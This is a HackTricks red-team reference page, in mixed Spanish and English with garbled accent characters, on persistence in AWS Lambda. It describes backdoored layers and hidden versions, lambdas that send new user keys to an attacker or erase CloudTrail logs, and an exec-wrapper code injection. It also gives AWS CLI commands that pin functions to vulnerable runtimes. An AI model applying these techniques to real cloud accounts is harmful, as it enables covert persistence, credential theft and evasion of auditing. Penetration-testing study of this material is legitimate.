AWS - Lambda Persistence

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Lambda

Para m谩s informaci贸n consulta:

AWS - Lambda Enum

Lambda Layer Persistence

It鈥檚 possible to introduce/backdoor a layer to execute arbitrary code when the lambda is executed in a stealthy way:

AWS - Lambda Layers Persistence

Lambda Extension Persistence

Abusing Lambda Layers it鈥檚 also possible to abuse extensions and persist in the lambda but also steal and modify requests.

AWS - Abusing Lambda Extensions

Via resource policies

Es posible conceder acceso a diferentes acciones de Lambda (como invoke o update code) a cuentas externas:

Versions, Aliases & Weights

A Lambda can have different versions (with different code each version).
Then, you can create different aliases with different versions of the lambda and set different weights to each.
This way an attacker could create a backdoored version 1 and a version 2 with only the legit code and only execute the version 1 in 1% of the requests to remain stealth.

Version Backdoor + API Gateway

  1. Copia el c贸digo original de la Lambda
  2. Create a new version backdooring the original code (or just with malicious code). Publish and deploy that version to $LATEST
  3. Llama al API Gateway relacionado con la Lambda para ejecutar el c贸digo
  4. Create a new version with the original code, Publish and deploy that version to $LATEST.
  5. Esto ocultar谩 el c贸digo backdoored en una versi贸n anterior
  6. Ve al API Gateway y create a new POST method (or choose any other method) that will execute the backdoored version of the lambda: arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1
  7. F铆jate en el :1 final del arn indicating the version of the function (version 1 will be the backdoored one in this scenario).
  8. Selecciona el POST method creado y en Actions selecciona Deploy API
  9. Ahora, cuando call the function via POST your Backdoor ser谩 invocado

Cron/Event actuator

El hecho de que puedas hacer que las funciones lambda se ejecuten cuando ocurre algo o cuando pasa cierto tiempo convierte a Lambda en una forma com煤n y 煤til de obtener persistencia y evitar la detecci贸n.
Aqu铆 tienes algunas ideas para hacer tu presencia en AWS m谩s sigilosa creando lambdas.

  • Cada vez que se crea un nuevo usuario una lambda genera una nueva user key y la env铆a al atacante.
  • Cada vez que se crea un nuevo role una lambda otorga permisos de assume role a usuarios comprometidos.
  • Cada vez que se generan nuevos logs de CloudTrail, elim铆nalos/alteralos

RCE abusing AWS_LAMBDA_EXEC_WRAPPER + Lambda Layers

Abuse the environment variable AWS_LAMBDA_EXEC_WRAPPER to execute an attacker-controlled wrapper script before the runtime/handler starts. Deliver the wrapper via a Lambda Layer at /opt/bin/htwrap, set AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap, and then invoke the function. The wrapper runs inside the function runtime process, inherits the function execution role, and finally execs the real runtime so the original handler still executes normally.

AWS - Lambda Exec Wrapper Persistence

AWS - Lambda Function URL Public Exposure

Abuse Lambda asynchronous destinations together with the Recursion configuration to make a function continually re-invoke itself with no external scheduler (no EventBridge, cron, etc.). By default, Lambda terminates recursive loops, but setting the recursion config to Allow re-enables them. Destinations deliver on the service side for async invokes, so a single seed invoke creates a stealthy, code-free heartbeat/backdoor channel. Optionally throttle with reserved concurrency to keep noise low.

AWS - Lambda Async Self Loop Persistence

AWS - Lambda Alias-Scoped Resource Policy Backdoor

Create a hidden Lambda version with attacker logic and scope a resource-based policy to that specific version (or alias) using the --qualifier parameter in lambda add-permission. Grant only lambda:InvokeFunction on arn:aws:lambda:REGION:ACCT:function:FN:VERSION to an attacker principal. Normal invocations via the function name or primary alias remain unaffected, while the attacker can directly invoke the backdoored version ARN.

This is stealthier than exposing a Function URL and doesn鈥檛 change the primary traffic alias.

AWS - Lambda Alias Version Policy Backdoor

Freezing AWS Lambda Runtimes

Un atacante que disponga de permisos lambda:InvokeFunction, logs:FilterLogEvents, lambda:PutRuntimeManagementConfig, y lambda:GetRuntimeManagementConfig puede modificar la runtime management configuration de una funci贸n. Este ataque es especialmente efectivo cuando el objetivo es mantener una funci贸n Lambda en una versi贸n de runtime vulnerable o preservar compatibilidad con layers maliciosos que podr铆an ser incompatibles con runtimes m谩s nuevos.

El atacante modifica la runtime management configuration para fijar la versi贸n del runtime:

# Invoke the function to generate runtime logs
aws lambda invoke \
--function-name $TARGET_FN \
--payload '{}' \
--region us-east-1 /tmp/ping.json

sleep 5

# Freeze automatic runtime updates on function update
aws lambda put-runtime-management-config \
--function-name $TARGET_FN \
--update-runtime-on FunctionUpdate \
--region us-east-1

Verifica la configuraci贸n aplicada:

aws lambda get-runtime-management-config \
--function-name $TARGET_FN \
--region us-east-1

Opcional: fijar a una versi贸n espec铆fica del runtime

# Extract Runtime Version ARN from INIT_START logs
RUNTIME_ARN=$(aws logs filter-log-events \
--log-group-name /aws/lambda/$TARGET_FN \
--filter-pattern "INIT_START" \
--query 'events[0].message' \
--output text | grep -o 'Runtime Version ARN: [^,]*' | cut -d' ' -f4)

Fijar a una versi贸n espec铆fica del runtime:

aws lambda put-runtime-management-config \
--function-name $TARGET_FN \
--update-runtime-on Manual \
--runtime-version-arn $RUNTIME_ARN \
--region us-east-1

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks